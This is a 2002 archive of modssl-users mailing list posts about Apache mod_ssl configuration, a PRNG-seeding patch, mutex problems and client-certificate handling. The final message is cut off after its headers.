Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1F842.DF7F88AE"
Subject: prng seeding in mod_ssl 2.8.6
X-MimeOLE: Produced By Microsoft Exchange V6.0.4417.0
Date: Fri, 10 May 2002 17:51:04 +0100
Message-ID: <9CC75308C175544A96639D81CF07B1230566F4@Aep-Mail.aep-net.com>
Thread-Topic: prng seeding in mod_ssl 2.8.6
Thread-Index: AcH4Qt+CHfLiu9ZSSuOjTKnVXTKu9Q==
From: "Noel O'Kelly" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Noel O'Kelly" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C1F842.DF7F88AE
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

We have a report of a  problem from 2.8.6 onwards due to a change in the
seeding of the PRNG which halves the=20
performance of SSL requests. Any update on this ???

Regards
Noel O'Kelly


Accelerated Encryption Processing Ltd.

Bray Business Park,
Southern Cross Route ,
Bray, Co Wicklow,
Ireland

********************************************************************
This email and any files transmitted with it are confidential=20
and intended solely for the use of the individual or entity to
whom they are addressed. If you have received this email
 in error please notify the postmaster at the address below.

     postmaster@aep.ie

This footnote also confirms that this email message has been
checked the presence of computer viruses.

**********************************************************************


------_=_NextPart_001_01C1F842.DF7F88AE
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






prng seeding in mod_ssl 2.8.6





We have a report of a  problem from 2=
.8.6 onwards due to a change in the seeding of the PRNG which halves the 


performance of SSL requests. Any update o=
n this ???




Regards


Noel O'Kelly







Accelerated Encryption Processing Ltd.



Bray Business Park,

Southern Cross Route ,

Bray, Co Wicklow,

Ireland



********************************************************************

This email and any files transmitted with it are confidential 

and intended solely for the use of the individual or entity to

whom they are addressed. If you have received this email

 in error please notify the postmaster at the address below.



     postmaster@aep.ie



This footnote also confirms that this email message has been

checked the presence of computer viruses.



**********************************************************************




------_=_NextPart_001_01C1F842.DF7F88AE--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 23:31:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA27748; Fri, 10 May 2002 23:30:49 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from executor.cambridge.redhat.com id XAA27661; Fri, 10 May 2002 23:29:52 +0200 (MET DST)
Received: from host181.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by executor.cambridge.redhat.com (Postfix) with ESMTP id C111DABAFC
	for ; Fri, 10 May 2002 22:29:45 +0100 (BST)
Received: (from jorton@localhost)
	by host181.cambridge.redhat.com (8.11.6/8.11.0) id g4ALSmH10596;
	Fri, 10 May 2002 22:28:48 +0100
X-Authentication-Warning: radish.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Fri, 10 May 2002 22:28:48 +0100
From: Joe Orton 
To: "Noel O'Kelly" 
Cc: modssl-users@modssl.org
Subject: Re: prng seeding in mod_ssl 2.8.6
Message-ID: <20020510222848.A10399@redhat.com>
Mail-Followup-To: Noel O'Kelly , modssl-users@modssl.org
References: <9CC75308C175544A96639D81CF07B1230566F4@Aep-Mail.aep-net.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <9CC75308C175544A96639D81CF07B1230566F4@Aep-Mail.aep-net.com>; from Noel@aep.ie on Fri, May 10, 2002 at 05:51:04PM +0100
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, May 10, 2002 at 05:51:04PM +0100, Noel O'Kelly wrote:
> We have a report of a  problem from 2.8.6 onwards due to a change in the
> seeding of the PRNG which halves the 
> performance of SSL requests. Any update on this ???

Hi, here's the fix we're using...

Submitted by: Nalin Dahyabhai 

--- mod_ssl/pkg.sslmod/ssl_engine_rand.c
+++ mod_ssl/pkg.sslmod/ssl_engine_rand.c
@@ -156,6 +156,9 @@
                  */
                 if (ap_scoreboard_image != NULL && SCOREBOARD_SIZE > 16) {
                     m = ((SCOREBOARD_SIZE / 2) - 1);
+                    if (m > 1024) {
+                        m = 1024;
+                    }
                     n = ssl_rand_choosenum(0, m);
                     RAND_seed(((unsigned char *)ap_scoreboard_image)+n, m);
                     nDone += m;

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 23:41:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA28565; Fri, 10 May 2002 23:40:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id XAA28494; Fri, 10 May 2002 23:39:47 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4ALcxB04375;
	Fri, 10 May 2002 17:38:59 -0400
Date: Fri, 10 May 2002 17:38:59 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org, 
cc: "Noel O'Kelly" 
Subject: Re: prng seeding in mod_ssl 2.8.6
In-Reply-To: <20020510222848.A10399@redhat.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 10 May 2002, Joe Orton wrote:

> On Fri, May 10, 2002 at 05:51:04PM +0100, Noel O'Kelly wrote:
> > We have a report of a  problem from 2.8.6 onwards due to a change in the
> > seeding of the PRNG which halves the
> > performance of SSL requests. Any update on this ???
>
> Hi, here's the fix we're using...
>
> Submitted by: Nalin Dahyabhai 
>
> --- mod_ssl/pkg.sslmod/ssl_engine_rand.c
> +++ mod_ssl/pkg.sslmod/ssl_engine_rand.c
> @@ -156,6 +156,9 @@
>                   */
>                  if (ap_scoreboard_image != NULL && SCOREBOARD_SIZE > 16) {
>                      m = ((SCOREBOARD_SIZE / 2) - 1);
> +                    if (m > 1024) {
> +                        m = 1024;
> +                    }
>                      n = ssl_rand_choosenum(0, m);
>                      RAND_seed(((unsigned char *)ap_scoreboard_image)+n, m);
>                      nDone += m;


FYI, this problem does not affect Apache 2.0+mod_ssl.  It _would_ have,
because I forward-ported this change to Apache 2.0 between 2.0.32 and
2.0.33.

http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/ssl/ssl_engine_rand.c.diff?r1=1.11&r2=1.12

But the group consensus was that we should *not* be using the scoreboard a
source of entropy at all because it's too easy for the client to
manipulate.  And then there's this problem.  At any rate, the patch was
reverted out of Apache 2.0 prior to 2.0.33.

http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/ssl/ssl_engine_rand.c.diff?r1=1.12&r2=1.13

I'd suggest the same change in 2.8.9-dev: just get rid of the scoreboard
as a source of entropy altogether.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 23:45:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA28738; Fri, 10 May 2002 23:42:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id XAA28700; Fri, 10 May 2002 23:42:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 419844CE788; Fri, 10 May 2002 23:42:04 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4ALfiK25943; Fri, 10 May 2002 23:41:44 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail1.servstream.com id QAA02172; Fri, 10 May 2002 16:46:40 +0200 (MET DST)
Received: from xev.servstream.com ([193.41.1.65])
	by mail1.servstream.com (8.11.6/8.11.6) with SMTP id g4AEkdr32055
	for ; Fri, 10 May 2002 15:46:39 +0100
Date: Fri, 10 May 2002 15:38:27 +0100
From: Patrick Herborn 
To: modssl-users@modssl.org
Subject: Re: Apache 2.0.36, load balancer and SSLMutex
Message-Id: <20020510153827.5e5a9aec.patrick.herborn@bbc.co.uk>
In-Reply-To: <20020510154836.A21666@unicast.org>
References: <20020510154836.A21666@unicast.org>
Organization: BBC Technology Limited
X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Patrick Herborn 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 10 May 2002 15:48:36 +0200
Guan Yang  wrote:

> Hi,
> 
> I am having some problems with Apache 2.0.36. We have 4 webservers behind a
> load balancer (Cisco LocalDirector) that is running mod_ssl. Apache was
> configured with a simple ./configure --enable-ssl --enable-proxy.
>
> When I try to run SSLMutex sem on each server, it is able to respond to 3
> or 4 requests, but then stops working. There is no response. and log
> messages like these appear:
> 
> ssl_engine_log:[10/May/2002 15:33:11 29273] [warn]  Failed to acquire
> global mutex lock
> ssl_engine_log:[10/May/2002 15:33:11 29273] [warn]  Failed to release
> global mutex lock
> ssl_engine_log:[10/May/2002 15:33:12 29276] [warn]  Failed to acquire
> global mutex lock
> ssl_engine_log:[10/May/2002 15:33:12 29276] [warn]  Failed to release
> global mutex lock
> ssl_engine_log:[10/May/2002 15:33:12 29277] [warn]  Failed to acquire
> global mutex lock
> ssl_engine_log:[10/May/2002 15:33:12 29277] [warn]  Failed to release
> global mutex lock
> 
> Things only work when I use SSLMutex none, but the documentation advises me
> not to do this. Is there anything that I should do?

I have found that the autoconf tries to use System V semaphores on Linux, and
this is a little broken, so it tends to hand the SSL engine. I had to alter the
configure script so that it fell back to using fcntl / flock type mutexes. Once
that was done, everything started to work again. Dunno if you are running a
similar setup, but if you are it's worth a try...

Cheers,

Pat.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 11 00:19:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA03330; Sat, 11 May 2002 00:15:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from delphi.bsd.uchicago.edu id AAA03072; Sat, 11 May 2002 00:14:54 +0200 (MET DST)
Received: (qmail 13619 invoked from network); 10 May 2002 22:14:53 -0000
Received: from unknown (HELO bmimac26.bsd.uchicago.edu) (128.135.182.36)
  by delphi.bsd.uchicago.edu with SMTP; 10 May 2002 22:14:53 -0000
Message-Id: <5.1.0.14.2.20020511051518.00ae0d30@delphi.bsd.uchicago.edu>
X-Sender: imiller@delphi.bsd.uchicago.edu
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Sat, 11 May 2002 05:18:07 -0500
To: modssl-users@modssl.org
From: Ian Miller 
Subject: looking for the sign.sh file
In-Reply-To: <200205102144.XAA28915@opensource.ee.ethz.ch>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ian Miller 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Looking for the sign.sh file in apache 2.0
Ian miller

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun May 12 08:51:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA02398; Sun, 12 May 2002 08:50:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.int.tele.dk id IAA02388; Sun, 12 May 2002 08:49:56 +0200 (MET DST)
Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500)
	id 79B78BD2C; Sun, 12 May 2002 08:49:54 +0200 (CEST)
Date: Sun, 12 May 2002 08:49:54 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: looking for the sign.sh file
Message-ID: <20020512064954.GA21226@marvin-lnx.int.tele.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <200205102144.XAA28915@opensource.ee.ethz.ch> <5.1.0.14.2.20020511051518.00ae0d30@delphi.bsd.uchicago.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <5.1.0.14.2.20020511051518.00ae0d30@delphi.bsd.uchicago.edu>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sat, May 11, 2002 at 05:18:07AM -0500, Ian Miller wrote:
> Looking for the sign.sh file in apache 2.0

It isn't there, but you can grab the one from 1.3 at
http://www.modssl.org/source/cvs/exp/mod_ssl/pkg.mod_ssl/pkg.contrib/sign.sh?rev=1.7&hideattic=1&sortbydate=0

vh

Mads Toftum
-- 
With a rubber duck, one's never alone.
              -- "The Hitchhiker's Guide to the Galaxy"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun May 12 21:08:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA16201; Sun, 12 May 2002 21:07:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta01.chello.no id VAA16156; Sun, 12 May 2002 21:06:26 +0200 (MET DST)
Received: from rlnzi51.cm.chello.no ([62.179.182.175]) by mta01.chello.no
          (InterMail vK.4.04.00.00 201-232-137 license e49469e1064252e0c4d3b333458c6cb7)
          with ESMTP id <20020512190624.ZULU402.mta01@rlnzi51.cm.chello.no>
          for ; Sun, 12 May 2002 21:06:24 +0200
Subject: OT: Getting ssl information in another module
From: Erik Axel Nielsen 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.4 
Date: 12 May 2002 21:04:29 +0200
Message-Id: <1021230270.1442.105.camel@rlnzi51>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Erik Axel Nielsen 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi

I'm developing a "new" Apache mod called mod_log_sql. As the name
suggests it logs
Apache-logs into a relational database. 
My work is based upon mod_log_mysql and mod_log_config. 
mod_log_mysql is a very fine module, but it doesn't support Apache 2.0.
Therefore I decided to make a new one. Anyways, in mod_log_mysql SSL
logging
is provided with the following function:
---codestart---

static const char *extract_ssl_cipher(request_rec *r, char *a)
{
        char *result = NULL;
        
        if (ap_ctx_get(r->connection->client->ctx, "ssl") != NULL) {
            result = ssl_var_lookup(r->pool, r->server, r->connection,
r, "SSL_CIPHER");
                #ifdef DEBUG
            ap_log_error(APLOG_MARK,DEBUGLEVEL,r->server,"SSL_CIPHER:
%s", result);
                #endif
                if (result != NULL && result[0] == '\0')
              result = NULL;
                return result;
        } else {
                return "-";
        }
}
---codeend---

I have been looking all over (apache search, google, and in the source)
for an description for the ap_ctx_get
function and haven't found anything. 
I wondered if you could give me a hint on where I could get the
information to:
1. check if mod_ssl is used (a https:// request)
2. Get the cipher,key and maxkey.

Any help would be very apreciated.

Regards

Erik Axel Nielsen
Illumina DA

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 13 01:31:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA03143; Mon, 13 May 2002 01:30:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id BAA03083; Mon, 13 May 2002 01:29:14 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4CNSI805074
	for ; Sun, 12 May 2002 19:28:19 -0400
Date: Sun, 12 May 2002 19:28:18 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: OT: Getting ssl information in another module
In-Reply-To: <1021230270.1442.105.camel@rlnzi51>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On 12 May 2002, Erik Axel Nielsen wrote:

> I have been looking all over (apache search, google, and in the source)
> for an description for the ap_ctx_get
> function and haven't found anything.

ap_ctx_* were part of Ralf's EAPI extensions to Apache, which were a set
of patches that had to be applied to Apache in order for mod_ssl to work.
EAPI for 1.3.x was distributed with mod_ssl.  It no longer applies.

> I wondered if you could give me a hint on where I could get the
> information to:
> 1. check if mod_ssl is used (a https:// request)
> 2. Get the cipher,key and maxkey.

You might want to ask these on dev@httpd.apache.org.  I'd answer them
myself but I don't know the answers.  The optional
function ssl_lookup_var() would probbly help out though.

--Cliff

--------------------------------------------------------------
   Cliff Woolley
   cliffwoolley@yahoo.com
   Charlottesville, VA


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 13 17:55:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA03410; Mon, 13 May 2002 17:54:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ginevra.ikstore.com id RAA03348; Mon, 13 May 2002 17:53:26 +0200 (MET DST)
Received: (from www@localhost)
	by ginevra.ikstore.com (8.9.3/8.9.3) id KAA00906;
	Mon, 13 May 2002 10:54:40 -0500
Date: Mon, 13 May 2002 10:54:40 -0500
From: buka@ikmultimedia.com
Message-Id: <200205131554.KAA00906@ginevra.ikstore.com>
X-Authentication-Warning: ginevra.ikstore.com: www set sender to buka using -f
To: modssl-users@modssl.org
X-Mailer: AeroMail (http://the.cushman.net/reverb/aeromail/)
Subject: client certificate requested for EVERY html page
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: buka@ikmultimedia.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi, i've set up an Apache/mod_ssl web server, create a CA, installed
the server certifcate, etc, etc.

The i went trough the CLIENT CERTIFICATE process.
everything worked fine (Client Request -> CA Sign the cert
  -> Browser LOAD the cert)


THE PROBLEM IS that the SERVER REQUEST THE CERTIFICATE EVERY TIME I
  LOAD A NEW HTML PAGE. This means that the browser - NETSCAPE 6.2.1 - 
  display continuously the CLIENT CERTIFICATE REQUEST windows!

This is the httpd config:
-------------------------
  SSLVerifyClient none
  SSLCACertificateFile /...correct_path_here.../cacert.pem
  
    SSLVerifyClient require
    SSLVerifyDepth  1
  

....and i have 3 HTML pages in /work dir, each containing 
a LINK to the others (to test the system)

AM I MISSING SOMETHING REALLY ...obvious...?

TIA
luca.







______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 13 19:04:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA09492; Mon, 13 May 2002 19:03:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from raq76.uk2net.com.local id TAA09444; Mon, 13 May 2002 19:02:43 +0200 (MET DST)
Received: from kursa ([62.189.189.145])
	by raq76.uk2net.com.local (8.9.3/8.9.3) with ESMTP id SAA11449
	for ; Mon, 13 May 2002 18:02:39 +0100
From: "Jeff" 
To: 
Subject: RE: client certificate requested for EVERY html page
Date: Mon, 13 May 2002 18:02:00 +0100
Message-ID: <000d01c1fa9f$faee7480$3264a8c0@kursa>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: <200205131554.KAA00906@ginevra.ikstore.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I found this in my old notes - it may help you?

Q) Netscape keeps asking me which certificate to use
   for every single page on a site - why?

A) The Netscape security settings are incorrect. 
   To fix this problem: 
   . Click on the padlock at the bottom left of the 
     window to display 'Security Info' 
   . Click on 'Navigator' to display the Navigator 
     security settings 
   . Under 'Certificate to identify you to a web site:' 
     choose 'Select Automatically'
   . Click on the 'Ok' button to save this change. 

Note that Apache is doing what you have asked it to do,
in that all items under location /work require a client
cert. There are SSL settings called keepalive which were
ment to help speed up the SSL connection, but MS IE does
not work properly with them, so you cannot turn them on
unless you only have Netscape clients.

Regards
Jeff

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of
buka@ikmultimedia.com
Sent: 13 May 2002 16:55
To: modssl-users@modssl.org
Subject: client certificate requested for EVERY html page


Hi, i've set up an Apache/mod_ssl web server, create a CA, installed
the server certifcate, etc, etc.

The i went trough the CLIENT CERTIFICATE process.
everything worked fine (Client Request -> CA Sign the cert
  -> Browser LOAD the cert)


THE PROBLEM IS that the SERVER REQUEST THE CERTIFICATE EVERY TIME I
  LOAD A NEW HTML PAGE. This means that the browser - NETSCAPE 6.2.1 - 
  display continuously the CLIENT CERTIFICATE REQUEST windows!

This is the httpd config:
-------------------------
  SSLVerifyClient none
  SSLCACertificateFile /...correct_path_here.../cacert.pem
  
    SSLVerifyClient require
    SSLVerifyDepth  1
  

....and i have 3 HTML pages in /work dir, each containing 
a LINK to the others (to test the system)

AM I MISSING SOMETHING REALLY ...obvious...?

TIA
luca.







______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 14 11:43:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA18981; Tue, 14 May 2002 11:42:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from firewall1.siemens-sbs.ch id LAA18971; Tue, 14 May 2002 11:41:54 +0200 (MET DST)
Received: from zrha220a.siemens-sbs.ch ([194.204.64.135]) by firewall1.siemens-sbs.ch
          via smtpd (for opensource-01.ee.ethz.ch [129.132.7.153]) with SMTP; 14 May 2002 09:41:54 UT
Received: from extranet1.siemens-sbs.ch (fw3ext.siemens-sbs.ch [194.204.64.99])
	by zrha220a.siemens-sbs.ch (Build 101 8.9.3/NT-8.9.3) with SMTP id LAA08002
	for ; Tue, 14 May 2002 11:41:54 +0200
Received: from fw3ext.siemens-sbs.ch ([194.204.64.99]) by extranet1.siemens-sbs.ch
          via smtpd (for zrha220a.siemens-sbs.ch [194.204.64.135]) with SMTP; 14 May 2002 09:41:54 UT
Received: from zrha221a.siemens.ch by fw3ext.siemens.ch
          via smtpd (for zrha220a.siemens-sbs.ch [194.204.64.135]) with SMTP; 14 May 2002 09:41:51 UT
Received: from zrha131a.zrh.siemens.ch (ZRHA131A.zrh.siemens.ch [139.16.10.12])
	by zrha221a.zrh.siemens.ch (Build 101 8.9.3/NT-8.9.3) with ESMTP id LAA08814
	for ; Tue, 14 May 2002 11:43:36 +0200
Received: by ZRHA131A.zrh.siemens.ch with Internet Mail Service (5.5.2653.19)
	id ; Tue, 14 May 2002 11:41:52 +0200
Message-ID: 
From: Fischer Roman 
To: "'modssl-users@modssl.org'" 
Subject: Client-Certificates containing spaces
Date: Tue, 14 May 2002 11:41:24 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id LAA18972
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Fischer Roman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear mod_ssl community,

Haven't found anything in the archives, faq or the 'net in general...

I have tried to use Apache+mod_ssl with "SSLOptions +FakeBasicAuth". The
feature works as advertised, as long as there are NO SPACES in the
one-line-description of the user-cert.

Is there a simple/standard way to handle user-certs which contain spaces?

Roug Soren from the Zope team seems to have had the same problem. His
solution (http://www.zope.org/Members/Roug/certificate_mapping) is to use
mod_rewrite to replace the spaces in user-names in the htpasswd file with
"0". While this solution would probably work, it somehow doesn't appeal my
sense of elegance... :)


Thans for any help...
Cheers
Roman

 
_______________________________________________________________________
Siemens Schweiz AG, Information Security, IS
Roman Fischer 
Freilagerstrasse 28, CH-8047 Zürich
Telefon +41 (0)585 583 857, Fax +41 (0)585 543 942, Mobil +41 (0)78 788 12
66
mailto:roman.rf.fischer@siemens.com, Internet: http://www.siemens.ch/

Important Note: This e-mail may contain trade secrets or privileged,
undisclosed or otherwise confidential information. If you have received this
e-mail in error, you are hereby notified that any review, copying or
distribution of it is strictly prohibited. Please inform us immediately and
destroy the original transmittal. Thank you for your cooperation. 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 14 17:07:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA17746; Tue, 14 May 2002 17:06:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dukas.upc.es id RAA17644; Tue, 14 May 2002 17:05:31 +0200 (MET DST)
Received: from selene.upc.es (selene.upc.es [147.83.83.65])
	by dukas.upc.es (8.12.1/8.12.1) with ESMTP id g4EF5ToG011427
	for ; Tue, 14 May 2002 17:05:29 +0200 (MET DST)
Received: from ruth.upc.es (ruth.upc.es [147.83.3.27])
	by selene.upc.es (8.9.3/8.9.3) with ESMTP id RAA434348
	for ; Tue, 14 May 2002 17:04:53 +0200 (CEST)
Received: from ruth.upc.es (220rar.upc.es [147.83.18.71])
	by ruth.upc.es (8.11.4/8.11.4) with ESMTP id g4EF4M023088
	for ; Tue, 14 May 2002 17:04:23 +0200
Message-ID: <3CE12900.D72E55BE@ruth.upc.es>
Date: Tue, 14 May 2002 17:10:57 +0200
From: Rafael Amer 
X-Mailer: Mozilla 4.7 [ca] (Win98; I)
X-Accept-Language: ca
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Server private key
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-ECS-MailScanner: Found to be clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rafael Amer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi.

Does anyboy know if it is possible to access the RSA private key of an
Apache server
with mod_ssl from another module written in C or Perl (mod_perl)?

Thanks.

Regards,
R. Amer

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 14 17:33:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA20328; Tue, 14 May 2002 17:32:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from Aep-Mail.aep-net.com id RAA20297; Tue, 14 May 2002 17:31:49 +0200 (MET DST)
Received: from Aep-Mail.aep-net.com (unverified) by Aep-Mail.aep-net.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Tue, 14 May 2002 16:35:05 +0100
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1FB5C.EB3536D9"
Subject: RE: prng seeding in mod_ssl 2.8.6
